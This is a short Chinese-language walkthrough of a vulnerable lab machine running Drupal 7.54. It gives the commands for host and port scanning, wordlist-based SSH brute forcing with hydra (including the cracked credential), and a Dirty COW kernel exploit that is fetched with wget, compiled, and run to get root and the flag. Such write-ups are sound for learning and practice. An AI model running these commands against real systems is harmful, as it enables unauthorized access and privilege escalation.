靶机链接 https://pan.baidu.com/s/1Xp8kQzyX01z29zjpctBniQ?pwd=8888
找网段存活主机,确定靶机(先关靶机扫一遍,再开机扫一遍,差异的那个就是)
fping -a -g -e 192.168.1.0/24
查看开放端口
nmap -sT --min-rate 10000 -p- 192.168.1.12
根据扫描结果针对性探测端口
sudo nmap -sT -sC -O -p22,53,80,1898 192.168.1.12
发现1898端口是Drupal
brup 探测目录, 确定cms版本 Drupal 7.54
http://192.168.1.12:1898/CHANGELOG.txt
获取用户名 tiago
http://192.168.1.12:1898/audio.m4a
二维码
http://192.168.1.12:1898/qrc.png
开始google drupal的exp
生成字典准备爆破ssh
cewl http://192.168.1.12:1898/?q=node/1 -w dict.txt
九头蛇爆破
hydra -l tiago -P dict.txt 192.168.1.12 ssh
爆破结果
[22][ssh] host: 192.168.1.12 login: tiago password: Virgulino
脏牛提权
searchsploit dirty
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/learn/02
利用python建立http服务
python2 -m SimpleHTTPServer 8888
ssh连接
ssh tiago@192.168.1.12
下载提权代码
wget http://192.168.1.14:8888/40847.cpp
编译
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
执行
./40847
获取root权限
Running ...
Received su prompt (Password: )
Root password is: dirtyCowFun
Enjoy! :-)
cd /root
cat flag.txt
9740616875908d91ddcdaa8aea3af366
其实还有别的思路后续再完善
Comments NOTHING